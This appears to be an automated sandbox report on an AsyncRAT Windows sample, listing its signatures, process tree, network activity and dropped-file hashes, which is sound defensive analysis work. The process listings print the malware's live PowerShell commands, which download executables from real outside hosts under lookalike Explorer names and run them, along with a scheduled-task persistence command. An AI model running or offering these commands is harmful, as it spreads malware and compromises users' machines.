Analysis Overview
SHA256
16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54
Threat Level: Known bad
The file 16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe was found to be: Known bad.
Malicious Activity Summary
Asyncrat family
Async RAT payload
AsyncRat
Async RAT payload
Executes dropped EXE
Checks computer location settings
Legitimate hosting services abused for malware hosting/C2
Unsigned PE
Enumerates physical storage devices
Suspicious use of WriteProcessMemory
Suspicious use of AdjustPrivilegeToken
Uses Task Scheduler COM API
Suspicious behavior: EnumeratesProcesses
Creates scheduled task(s)
Suspicious use of SetWindowsHookEx
Delays execution with timeout.exe
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-04-18 07:12
Signatures
Async RAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Asyncrat family
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral2
Detonation Overview
Submitted
2024-04-18 07:12
Reported
2024-04-18 07:15
Platform
win10v2004-20240412-en
Max time kernel
150s
Max time network
154s
Command Line
Signatures
AsyncRat
Async RAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-1826666146-2574340311-1877551059-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1826666146-2574340311-1877551059-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\system.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\system.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
Enumerates physical storage devices
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\system.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Users\Admin\AppData\Local\Temp\16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe
"C:\Users\Admin\AppData\Local\Temp\16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', '%Temp%\\ExpIorer.exe') & powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', '%Temp%\\ExplIorer.exe') & powershell Start-Process -FilePath '%Temp%\\ExpIorer.exe' & powershell Start-Process -FilePath '%Temp%\\ExplIorer.exe' & exit
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', 'C:\Users\Admin\AppData\Local\Temp\\ExpIorer.exe')
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', 'C:\Users\Admin\AppData\Local\Temp\\ExplIorer.exe')
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "system" /tr '"C:\Users\Admin\AppData\Roaming\system.exe"' & exit
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp7E67.tmp.bat""
C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "system" /tr '"C:\Users\Admin\AppData\Roaming\system.exe"'
C:\Windows\system32\timeout.exe
timeout 3
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\\ExpIorer.exe'
C:\Users\Admin\AppData\Roaming\system.exe
"C:\Users\Admin\AppData\Roaming\system.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', '%Temp%\\ExpIorer.exe') & powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', '%Temp%\\ExplIorer.exe') & powershell Start-Process -FilePath '%Temp%\\ExpIorer.exe' & powershell Start-Process -FilePath '%Temp%\\ExplIorer.exe' & exit
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', 'C:\Users\Admin\AppData\Local\Temp\\ExpIorer.exe')
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\\ExplIorer.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', 'C:\Users\Admin\AppData\Local\Temp\\ExplIorer.exe')
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\\ExpIorer.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\\ExplIorer.exe'
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 64.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 249.197.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.154.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | xcu.exgaming.click | udp |
| US | 8.8.8.8:53 | xcu5.exgaming.click | udp |
| US | 8.8.8.8:53 | 163.233.34.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | xcu.exgaming.click | udp |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 104.20.3.235:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | xcu5.exgaming.click | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 235.3.20.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.58.199.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 52.111.229.43:443 | tcp | |
| US | 8.8.8.8:53 | 22.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.173.189.20.in-addr.arpa | udp |
Files
memory/4004-0-0x00000000005C0000-0x00000000005D8000-memory.dmp
memory/4004-1-0x00007FFB930A0000-0x00007FFB93B61000-memory.dmp
memory/4004-3-0x000000001B400000-0x000000001B410000-memory.dmp
memory/3408-14-0x00007FFB930A0000-0x00007FFB93B61000-memory.dmp
memory/3408-13-0x000001FFB5430000-0x000001FFB5452000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_0njy1pvn.3ai.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3408-15-0x000001FFB5470000-0x000001FFB5480000-memory.dmp
memory/3408-16-0x000001FFB5470000-0x000001FFB5480000-memory.dmp
memory/3408-19-0x000001FFB5B70000-0x000001FFB5CDA000-memory.dmp
memory/3408-20-0x00007FFB930A0000-0x00007FFB93B61000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | 2f57fde6b33e89a63cf0dfdd6e60a351 |
| SHA1 | 445bf1b07223a04f8a159581a3d37d630273010f |
| SHA256 | 3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55 |
| SHA512 | 42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220 |
memory/4912-22-0x00007FFB930A0000-0x00007FFB93B61000-memory.dmp
memory/4912-23-0x000001E8BD290000-0x000001E8BD2A0000-memory.dmp
memory/4912-24-0x000001E8BD290000-0x000001E8BD2A0000-memory.dmp
memory/4004-38-0x00007FFBB1610000-0x00007FFBB1805000-memory.dmp
memory/4004-39-0x00007FFB930A0000-0x00007FFB93B61000-memory.dmp
memory/4004-40-0x00007FFBB1610000-0x00007FFBB1805000-memory.dmp
memory/4912-42-0x000001E8BD290000-0x000001E8BD2A0000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | e9c5f9e7437285aa87e4433bc7e0f9d7 |
| SHA1 | 2363ddac1155a065a54dc6a0fc307d86bd88246b |
| SHA256 | 0cb341e3c6fd873cf50bd24821761efdaec49406557f21db3f1a4ee68796b520 |
| SHA512 | 7cc866c84540c274e013a0eb453e89a27a52a410923ee28488f9b88d6fd8dad77c6e7e99e1cf97dc6202233a7d093e89bfc22eae3102d50cd83207d98b2f3cb2 |
C:\Users\Admin\AppData\Local\Temp\tmp7E67.tmp.bat
| MD5 | de534067b6262e543715278e864405e1 |
| SHA1 | f574aedf1af8dd559e13c49b74e436a8c7371f60 |
| SHA256 | 1d4dd497712d484440da7f1de1ccd15364c40fcc6b349fd3aa158a8397d93573 |
| SHA512 | 8e9a0325f585e8a9ac01c26c78b29360bf43fa1a840249955aab865fe6fdca63885b7b584c53fa161b6f7c28e0c650fa1dd92e2c5d214e4b655717c1b56bd6e5 |
memory/4912-45-0x00007FFB930A0000-0x00007FFB93B61000-memory.dmp
memory/1852-55-0x00007FFB930A0000-0x00007FFB93B61000-memory.dmp
memory/1852-56-0x00000284F82A0000-0x00000284F82B0000-memory.dmp
memory/1852-57-0x00000284F82A0000-0x00000284F82B0000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | e623e3603f24dc9b8549f420fe3c5aef |
| SHA1 | 782f48ac54014c8e165fc1f5c78bd128b7c9c640 |
| SHA256 | e40be6528731018eef4c05c5037d3164d87e33fb4d592d85de03cf71bb1980f7 |
| SHA512 | 31f83dd471749e343f8ee21912f1aca206499ba415a9bfb6f1d14fe738d74d92deba452a6f76a14a830a5f6c4462c45e51622d50e87e0d59165a00d53a79a225 |
C:\Users\Admin\AppData\Roaming\system.exe
| MD5 | a7d63348cfe9b0dc9d3aaec28c76c8f0 |
| SHA1 | 1b993f554960286e90cfd7cedf4c457e1c46ff80 |
| SHA256 | 16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54 |
| SHA512 | 3910836ccae023d562c66bfd754b0d1e3aadc4c1cbf57e96e8220c1de6534a529ec3630d595a7baba7c56ca503b6ce6d012b9c388b9f896f2a0a8be317ca5010 |
memory/4140-62-0x00007FFB930A0000-0x00007FFB93B61000-memory.dmp
C:\Users\Admin\AppData\Roaming\MyData\DataLogs.conf
| MD5 | cf759e4c5f14fe3eec41b87ed756cea8 |
| SHA1 | c27c796bb3c2fac929359563676f4ba1ffada1f5 |
| SHA256 | c9f9f193409217f73cc976ad078c6f8bf65d3aabcf5fad3e5a47536d47aa6761 |
| SHA512 | c7f832aee13a5eb36d145f35d4464374a9e12fa2017f3c2257442d67483b35a55eccae7f7729243350125b37033e075efbc2303839fd86b81b9b4dca3626953b |
memory/4140-64-0x000000001B040000-0x000000001B050000-memory.dmp
memory/1852-66-0x00007FFB930A0000-0x00007FFB93B61000-memory.dmp
memory/1328-67-0x00007FFB930A0000-0x00007FFB93B61000-memory.dmp
memory/1712-68-0x00007FFB930A0000-0x00007FFB93B61000-memory.dmp
memory/1712-69-0x0000019ECAAD0000-0x0000019ECAAE0000-memory.dmp
memory/1712-70-0x0000019ECAAD0000-0x0000019ECAAE0000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | b5506533654486099b48ee036f9ef543 |
| SHA1 | 768441bd2eb613df5b4e97d2d840726ca28b07f3 |
| SHA256 | d61f0401e469d696e9b1d27457a7e2682f399e2ca296f77e8743de23e4d9de4b |
| SHA512 | 514c722b0862672c7aa4cfb92243085fe058ea413a6001220008b71884ca8dec273ede232f05494f3a354446fc62e96b2472d476c5ee2f1d8e1e837c2aede9a6 |
memory/1712-90-0x0000019ECAAD0000-0x0000019ECAAE0000-memory.dmp
memory/1712-92-0x00007FFB930A0000-0x00007FFB93B61000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 68f7ed7a9faf5c82f2fc821a97f68087 |
| SHA1 | bb879765b9a0d1130ee1e269eeb617ad7db133d0 |
| SHA256 | 112e64911ce2ebcb7327222eed8b30f516d22dc05167b625a473dec93712e6cb |
| SHA512 | ff1b4735aceb582cd6d0e667794efc3371ce12b8bf23f456e7415ea97b707692bfefe040b963a44699d12a08d4b3f314858621b117e169355dd0e18c7e4a1e9d |
memory/1328-95-0x00007FFB930A0000-0x00007FFB93B61000-memory.dmp
memory/4140-96-0x00007FFBB1610000-0x00007FFBB1805000-memory.dmp
memory/1340-98-0x000001FD6DD10000-0x000001FD6DD20000-memory.dmp
memory/1340-99-0x000001FD6DD10000-0x000001FD6DD20000-memory.dmp
memory/1340-97-0x00007FFB930A0000-0x00007FFB93B61000-memory.dmp
memory/4140-110-0x00007FFB930A0000-0x00007FFB93B61000-memory.dmp
memory/1340-112-0x00007FFB930A0000-0x00007FFB93B61000-memory.dmp
memory/4140-113-0x000000001B040000-0x000000001B050000-memory.dmp
memory/1884-114-0x00007FFB930A0000-0x00007FFB93B61000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 72ce8e6d097c0c934ce5ffde536de571 |
| SHA1 | 296f99fc5f5b8b04e24203ac3d059a72fd0face4 |
| SHA256 | b2c8a41d654533b61deb2e133a6ae2db78bf1a9949d65d405528179895f9aa18 |
| SHA512 | c7ae06d8cf60ba60e493a839d93b739d5c313efb227d3e85e8db124674ca362b0e198d7bdfc197dba37e255de40376237693052ba6f2d78d9219f1ffe9f0d385 |
memory/1884-125-0x0000023119B50000-0x0000023119B60000-memory.dmp
memory/1884-127-0x00007FFB930A0000-0x00007FFB93B61000-memory.dmp
memory/3288-133-0x00007FFB930A0000-0x00007FFB93B61000-memory.dmp
memory/3288-134-0x000001C4FF060000-0x000001C4FF070000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 2578b2ca2525a3609fb41ad87f77409f |
| SHA1 | 75f907f5d330620918e5ce8126f73543fc9049f9 |
| SHA256 | 3a0ed5d2741de47a225249afe38f0befa053e44d6f1792f17793188192ddfdf4 |
| SHA512 | 272a28316eddc9360cc22d178a86b817db93848cf353980dccf85b681805a8cae949ae65080d4116baa52fe55c482b1906bcaae2e2fb3bf63ab01b92a1c3f775 |
memory/3288-140-0x000001C4FF060000-0x000001C4FF070000-memory.dmp
memory/3288-142-0x00007FFB930A0000-0x00007FFB93B61000-memory.dmp
memory/4140-143-0x00007FFBB1610000-0x00007FFBB1805000-memory.dmp
Analysis: behavioral1
Detonation Overview
Submitted
2024-04-18 07:12
Reported
2024-04-18 07:15
Platform
win7-20240221-en
Max time kernel
150s
Max time network
150s
Command Line
Signatures
AsyncRat
Async RAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\system.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
Enumerates physical storage devices
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\system.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Users\Admin\AppData\Local\Temp\16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe
"C:\Users\Admin\AppData\Local\Temp\16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', '%Temp%\\ExpIorer.exe') & powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', '%Temp%\\ExplIorer.exe') & powershell Start-Process -FilePath '%Temp%\\ExpIorer.exe' & powershell Start-Process -FilePath '%Temp%\\ExplIorer.exe' & exit
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', 'C:\Users\Admin\AppData\Local\Temp\\ExpIorer.exe')
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "system" /tr '"C:\Users\Admin\AppData\Roaming\system.exe"' & exit
C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\tmp3727.tmp.bat""
C:\Windows\system32\timeout.exe
timeout 3
C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "system" /tr '"C:\Users\Admin\AppData\Roaming\system.exe"'
C:\Users\Admin\AppData\Roaming\system.exe
"C:\Users\Admin\AppData\Roaming\system.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', 'C:\Users\Admin\AppData\Local\Temp\\ExplIorer.exe')
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', '%Temp%\\ExpIorer.exe') & powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', '%Temp%\\ExplIorer.exe') & powershell Start-Process -FilePath '%Temp%\\ExpIorer.exe' & powershell Start-Process -FilePath '%Temp%\\ExplIorer.exe' & exit
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', 'C:\Users\Admin\AppData\Local\Temp\\ExpIorer.exe')
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\\ExpIorer.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', 'C:\Users\Admin\AppData\Local\Temp\\ExplIorer.exe')
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\\ExplIorer.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\\ExpIorer.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\\ExplIorer.exe'
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | xcu.exgaming.click | udp |
| US | 8.8.8.8:53 | xcu5.exgaming.click | udp |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
Files
memory/2192-0-0x0000000000DB0000-0x0000000000DC8000-memory.dmp
memory/2192-1-0x000007FEF5950000-0x000007FEF633C000-memory.dmp
memory/1996-7-0x000000001B850000-0x000000001BB32000-memory.dmp
memory/1996-8-0x0000000001E70000-0x0000000001E78000-memory.dmp
memory/1996-9-0x000007FEEDFB0000-0x000007FEEE94D000-memory.dmp
memory/1996-10-0x0000000002CC0000-0x0000000002D40000-memory.dmp
memory/1996-11-0x000007FEEDFB0000-0x000007FEEE94D000-memory.dmp
memory/1996-12-0x0000000002CC0000-0x0000000002D40000-memory.dmp
memory/1996-13-0x0000000002CC0000-0x0000000002D40000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\tmp3727.tmp.bat
| MD5 | da995218b014b0710cd684f4b17004d7 |
| SHA1 | b2b6678af1b19afc608c6a632be09e975d4d2b75 |
| SHA256 | 58dc26ec3924579de22168382ad4e3b4aeee714df246c668fefb0d2c8536729f |
| SHA512 | b453fdda361d71ef98a2ad3082c7f7ded4912ddc13ac7af912f52f19ff48f567363a824cf4e94511935b34466fb0fe33437e170a407023e58aae3dab202a300e |
memory/2192-23-0x000007FEF5950000-0x000007FEF633C000-memory.dmp
memory/2192-24-0x0000000077590000-0x0000000077739000-memory.dmp
memory/1996-25-0x000007FEEDFB0000-0x000007FEEE94D000-memory.dmp
memory/1996-26-0x0000000002CCB000-0x0000000002D32000-memory.dmp
C:\Users\Admin\AppData\Roaming\system.exe
| MD5 | a7d63348cfe9b0dc9d3aaec28c76c8f0 |
| SHA1 | 1b993f554960286e90cfd7cedf4c457e1c46ff80 |
| SHA256 | 16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54 |
| SHA512 | 3910836ccae023d562c66bfd754b0d1e3aadc4c1cbf57e96e8220c1de6534a529ec3630d595a7baba7c56ca503b6ce6d012b9c388b9f896f2a0a8be317ca5010 |
memory/2464-30-0x00000000001D0000-0x00000000001E8000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\Q125AZ11C0IGZMISVW8E.temp
| MD5 | 5bedae33d43a46d566be309f7a9e8a42 |
| SHA1 | fa909fb005d680661b299930127f20a57dacc4ef |
| SHA256 | b43b8da7e86ade79c51c2318fb1a43e6d440a50ecd7bb4b1b1d6e4246647fe34 |
| SHA512 | 3b98e06f21b1d589cccffd7e546a37c780d22ad58ee2da4e37b39cb798f2555cc1d7281e31a029fe636fdc831edec8e3437f2529c3dfede69a364f9e8a5485ca |
C:\Users\Admin\AppData\Roaming\MyData\DataLogs.conf
| MD5 | cf759e4c5f14fe3eec41b87ed756cea8 |
| SHA1 | c27c796bb3c2fac929359563676f4ba1ffada1f5 |
| SHA256 | c9f9f193409217f73cc976ad078c6f8bf65d3aabcf5fad3e5a47536d47aa6761 |
| SHA512 | c7f832aee13a5eb36d145f35d4464374a9e12fa2017f3c2257442d67483b35a55eccae7f7729243350125b37033e075efbc2303839fd86b81b9b4dca3626953b |
memory/2464-39-0x000007FEF4F60000-0x000007FEF594C000-memory.dmp
memory/3048-38-0x0000000001D80000-0x0000000001D88000-memory.dmp
memory/3048-37-0x000000001B5F0000-0x000000001B8D2000-memory.dmp
memory/3048-41-0x000007FEEDDF0000-0x000007FEEE78D000-memory.dmp
memory/2924-50-0x000007FEEDDF0000-0x000007FEEE78D000-memory.dmp
memory/2464-51-0x000000001ACB0000-0x000000001AD30000-memory.dmp
memory/2924-52-0x0000000002CB0000-0x0000000002D30000-memory.dmp
memory/2924-49-0x0000000002CB0000-0x0000000002D30000-memory.dmp
memory/3048-48-0x0000000002920000-0x00000000029A0000-memory.dmp
memory/3048-47-0x000007FEEDDF0000-0x000007FEEE78D000-memory.dmp
memory/3048-42-0x0000000002920000-0x00000000029A0000-memory.dmp
memory/2924-55-0x0000000002CB0000-0x0000000002D30000-memory.dmp
memory/2464-54-0x0000000077590000-0x0000000077739000-memory.dmp
memory/3048-53-0x0000000002920000-0x00000000029A0000-memory.dmp
memory/3048-57-0x000007FEEDDF0000-0x000007FEEE78D000-memory.dmp
memory/2924-56-0x000007FEEDDF0000-0x000007FEEE78D000-memory.dmp
memory/536-73-0x0000000002DC0000-0x0000000002E40000-memory.dmp
memory/536-76-0x000007FEED450000-0x000007FEEDDED000-memory.dmp
memory/536-75-0x0000000002DC0000-0x0000000002E40000-memory.dmp
memory/536-74-0x000007FEED450000-0x000007FEEDDED000-memory.dmp
memory/1632-72-0x0000000002DF0000-0x0000000002E70000-memory.dmp
memory/1632-71-0x0000000002DF0000-0x0000000002E70000-memory.dmp
memory/1632-70-0x000007FEED450000-0x000007FEEDDED000-memory.dmp
memory/536-78-0x0000000002DC0000-0x0000000002E40000-memory.dmp
memory/1632-77-0x0000000002DF0000-0x0000000002E70000-memory.dmp
memory/1632-69-0x0000000002DF0000-0x0000000002E70000-memory.dmp
memory/1632-64-0x000007FEED450000-0x000007FEEDDED000-memory.dmp
memory/1632-79-0x000007FEED450000-0x000007FEEDDED000-memory.dmp
memory/1996-85-0x0000000002CC0000-0x0000000002D40000-memory.dmp
memory/1100-86-0x000007FEED450000-0x000007FEEDDED000-memory.dmp
memory/1100-87-0x0000000001E70000-0x0000000001EF0000-memory.dmp
memory/1100-88-0x000007FEED450000-0x000007FEEDDED000-memory.dmp
memory/2464-89-0x000007FEF4F60000-0x000007FEF594C000-memory.dmp
memory/1100-91-0x0000000001E70000-0x0000000001EF0000-memory.dmp
memory/1100-90-0x0000000001E70000-0x0000000001EF0000-memory.dmp
memory/1100-93-0x000007FEED450000-0x000007FEEDDED000-memory.dmp
memory/536-92-0x000007FEED450000-0x000007FEEDDED000-memory.dmp
memory/1660-103-0x0000000002D60000-0x0000000002DE0000-memory.dmp
memory/2464-104-0x0000000077590000-0x0000000077739000-memory.dmp
memory/1660-102-0x000007FEEDDF0000-0x000007FEEE78D000-memory.dmp
memory/1660-101-0x0000000002D60000-0x0000000002DE0000-memory.dmp
memory/1660-100-0x000007FEEDDF0000-0x000007FEEE78D000-memory.dmp
memory/2464-99-0x000000001ACB0000-0x000000001AD30000-memory.dmp
memory/1660-105-0x0000000002D60000-0x0000000002DE0000-memory.dmp
memory/1660-106-0x000007FEEDDF0000-0x000007FEEE78D000-memory.dmp
memory/448-112-0x000007FEED450000-0x000007FEEDDED000-memory.dmp
memory/448-113-0x0000000002CB0000-0x0000000002D30000-memory.dmp
memory/448-114-0x000007FEED450000-0x000007FEEDDED000-memory.dmp
memory/448-115-0x0000000002CB0000-0x0000000002D30000-memory.dmp
memory/448-116-0x0000000002CB0000-0x0000000002D30000-memory.dmp